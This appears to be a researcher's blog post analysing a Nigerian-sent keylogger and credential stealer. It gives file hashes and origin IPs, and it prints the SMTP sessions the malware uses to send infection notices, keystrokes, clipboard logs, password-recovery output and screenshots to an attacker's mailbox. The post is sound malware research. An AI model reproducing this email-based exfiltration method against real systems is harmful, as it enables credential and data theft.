Nigerian Malware by cross@livedata.hints.me

Another day another bit of e-mail junk.

This one came to me from an AOL email account (using an authenticated AOL user thereaty5@aol.com) submitted by IP 41.138.164.240. The mail was sent to an address scraped from the internet.

inetnum:        41.138.164.0 - 41.138.165.255
netname:        VISAFONE-PH-PDSN1
descr:          Visafone Communications Limited,
descr:          12, Ologun Agbaje Street,
descr:          Victoria Island,
descr:          Lagos
country:        NG

Interestingly enough Visafone normally is associated with financial 419 scams and it is the first time I’ve seem malware emanate from Nigeria.

The file attached was:
SHA256: 7d82144bde1d75f327f847c60b870a7c7dc7dc0367c20500e8cff645f3c30667
Virustotal Report
Malwr Report

Both sites had never seen the file before.

It then extracts another file and launches it.

SHA256: 4efdba83132aaab21cadfcf624d6f7ce5fa89e6497d8f302388303cdb9b3a023
Virustotal Report
Malwr Report

This component had been seen before but is not detected by any AV.

Once run it uses an unusual method to ex-filtrate data. sends a series of emails using SMTP server mx1.3owl.com on port 587. The first message informs the malware owner the system has been infected.

220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System]
EHLO w7vm1
250-mx1.main-hosting.com
250-PIPELINING
250-SIZE 5728640
250-ETRN
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU=
334 UGFzc3dvcmQ6
==
235 2.7.0 Authentication successful
MAIL FROM:<cross@livedata.hints.me>
250 2.1.0 Ok
RCPT TO:<cross@livedata.hints.me>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: cross@livedata.hints.me
To: cross@livedata.hints.me
Date: 26 Oct 2014 19:22:53 +0000
Subject: Logger - Server Ran - [W7VM1]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

This is an email notifying you that W7VM1 has ran your logger and emails=
 should be sent to you shortly and at interval choosen.=0D=0A =0D=0ALogger=
 Details: =0D=0AServer Name: scandetail.exe=0D=0AKeylogger Enabled: True=
=0D=0AClipboard-Logger Enabled: True=0D=0ATime Logs will be delivered: Every=
 10 minutes=0D=0A =0D=0AStealers Enabled: True=0D=0ATime Log will be delivered:=
 Average 2 to 4 minutes=0D=0A =0D=0ALocal Date and Time: 26/10/2014 19:22:51=
=0D=0AInstalled Language: en-US=0D=0AOperating System: Microsoft Windows=
 7 Professional =0D=0AInternal IP Address: REDACTED=0D=0AExternal IP=
 Address: REDACTED=0D=0AInstalled Anti-Virus: =0D=0AInstalled Firewall:=
 

.
250 2.0.0 Ok: queued as A05F9144111D
421 4.4.2 mx1.main-hosting.com Error: timeout exceeded

Then steals information from the system.

220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System]
EHLO w7vm1
250-mx1.main-hosting.com
250-PIPELINING
250-SIZE 5728640
250-ETRN
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU=
334 UGFzc3dvcmQ6
==
235 2.7.0 Authentication successful
MAIL FROM:<cross@livedata.hints.me>
250 2.1.0 Ok
RCPT TO:<cross@livedata.hints.me>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: cross@livedata.hints.me
To: cross@livedata.hints.me
Date: 26 Oct 2014 18:53:29 +0000
Subject: Logger|Recovery Log - [W7VM1]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

 **********************************************=
=0D=0A Operating System Intel Recovery=
=0D=0A **********************************************=
=0D=0ACPU Name: W7VM1=0D=0ALocal Date and Time: 26/10/2014 18:53:22=0D=0AInstalled=
 Language: en-US=0D=0ANet Version: 2.0.50727.5420=0D=0AOperating System=
 Platform: Win32NT=0D=0AOperating System Version: 6.1.7601.65536=0D=0AOperating=
 System: Microsoft Windows 7 Professional =0D=0AInternal IP Address: REDACTED=
=0D=0AExternal IP Address: REDACTED=0D=0AInstalled Anti-Virus: =0D=0AInstalled=
 Firewall: =0D=0A **********************************************=
=0D=0A WEB Browser Password Recovery=
=0D=0A **********************************************=
=0D=0A=0D=0A **********************************************=
=0D=0A Mail Messenger Password Recovery=
=0D=0A **********************************************=
=0D=0A=0D=0A **********************************************=
=0D=0A Internet Download Manager Recovery=
=0D=0A **********************************************=
=0D=0A **********************************************=
=0D=0A Jdownloader Password Recovery=
=0D=0A **********************************************=
=0D=0A **********************************************=
=0D=0A Steam Username Recovery=
=0D=0A **********************************************=
=0D=0A

.
250 2.0.0 Ok: queued as 92F9D14401FA

Then screenshots

220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System]
EHLO w7vm1
250-mx1.main-hosting.com
250-PIPELINING
250-SIZE 5728640
250-ETRN
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU=
334 UGFzc3dvcmQ6
==
235 2.7.0 Authentication successful
MAIL FROM:<cross@livedata.hints.me>
250 2.1.0 Ok
RCPT TO:<cross@livedata.hints.me>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: cross@livedata.hints.me
To: cross@livedata.hints.me
Date: 26 Oct 2014 19:32:53 +0000
Subject: Logger - Key Recorder - [W7VM1]
Content-Type: multipart/mixed; boundary=--boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be


----boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

 **********************************************=
=0D=0A ClipBoard Log=0D=0A=
 **********************************************=
=0D=0A[------------19:22:51------------]=0D=0Ahttps://www.virustotal.com/en-gb/file/4efdba83132aaab21cadfcf624d6f7ce5fa89e6497d8f302388303cdb9b3a023/analysis/1414351286/=
=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]=
=0D=0A=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me=
=0D=0A=0D=0A[------------19:28:55------------]=0D=0A=0D=0A=0D=0A[------------19:30:28------------]=
=0D=0A=0D=0ALOL=0D=0A=0D=0A=0D=0A **********************************************=
=0D=0A Keylogger Log=0D=0A=
 **********************************************=
=0D=0A=0D=0A=0D=0A[Untitled - Notepad - 26/10/2014 19:24:51]=0D=0A[BS] [del]=
 are [ctrl] 35[/ctrl]=0D=0A=0D=0ALOL=0D=0ALOL=0D=0ALOL[^] [ctrl]=
 cvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv[/ctrl]
----boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be
Content-Type: application/octet-stream; name=screenshot1.jpeg
Content-Transfer-Encoding: base64

iVBORw0KGgoAAAANSUhEUgAABJ4AAAOJCAYAAABcZ+hHAAAAAXNSR0IArs4c6QAAAARnQU1B
TRUNCATED

So poorly done. The mail is submitted using AUTH with the details of the mail account!

User: cross@livedata.hints.me
Password: REDACTED

oops!

Additionally another address seems related to this: ab.frankmoore@live.com (friendly name of “Wofa Group Plc”, which appears on one website as a company in… Nigeria) which was also used in September 2013 to send similar “please open the attached” malware type email. In some test messages the IP 41.138.164.31 (similar to the one above) registered at Nigeria’s VISAFONE  was used to submit via webmail.

At the time of researching and writing this document it seems nobody has fallen for this other than researchers. (tag: ubapaul)

Advertisements